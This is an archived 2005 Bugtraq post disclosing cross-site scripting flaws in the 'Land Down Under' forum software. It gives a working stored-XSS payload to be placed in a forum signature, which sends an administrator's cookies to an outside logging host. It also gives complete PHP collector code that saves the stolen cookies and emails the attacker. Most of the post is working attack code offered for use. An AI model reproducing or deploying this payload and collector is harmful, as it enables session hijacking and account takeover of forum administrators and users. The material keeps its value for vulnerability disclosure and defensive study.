Land Down Under

bendeniz_avci_at_hotmail.com
Date: 08/28/05

  • Next message: Secunia Research: "Secunia Research: SqWebMail HTML Emails Script Insertion Vulnerability"
    Date: 28 Aug 2005 07:55:34 -0000
    To: bugtraq@securityfocus.com
    
    
    ('binary' encoding is not supported, stored as-is) Bug finder:spyMASter
    Web site:Realhackers.net
    Contact:bendeniz_avci@hotmail.com

    LDU has some xss vulns
    Firstly you can use html codes in your signature you can get cookies with this
    put your signature that code

    <SCRIPT> location.href='http://site.com/log/ekle.php?c='+escape(document. cookie)</SCRIPT>

    and post a topic to forum when admin look this topic she/he redirect and you can get cookie

    this is codes of ekle.php you can save cookie to a with this php code

    <?php
    $kayit = fopen("spymaster.txt","a");
    foreach($_GET as $variable => $value) {
    fwrite($kayit,$variable . ": " . $value . "\n");
    }
    fwrite($kayit,"---------------------------\n");
    fclose($kayit);
    mail("bendeniz_avci@hotmail.com","your cookie ready","http://www.realhackers.net/spyoku.txt",'From: spymaster@realhackers.net');
    ?>


  • Next message: Secunia Research: "Secunia Research: SqWebMail HTML Emails Script Insertion Vulnerability"

    Relevant Pages

    • signatures
      ... I am trying to set up a signature with graphic for email. ... pdf file in adobe acrobat but when I try to use it in ... outlook as a signature file it brings it in as a series ... of codes. ...
      (microsoft.public.outlook)
    • Re: Determining success of WGET
      ... >John Poltorak wrote: ... >> I don't know if these codes are documented, but I believe you can get ... perhaps a different tool is indicated, e.g., curl. ...
      (comp.unix.shell)
    • How can I destroy cookies
      ... I set cookie by using the codes below ... I am using the cookies for users authentation. ...
      (php.general)
    • How do I destroy cookies
      ... I set cookie by using the codes below ... I am using the cookies for users authentation. ...
      (php.general)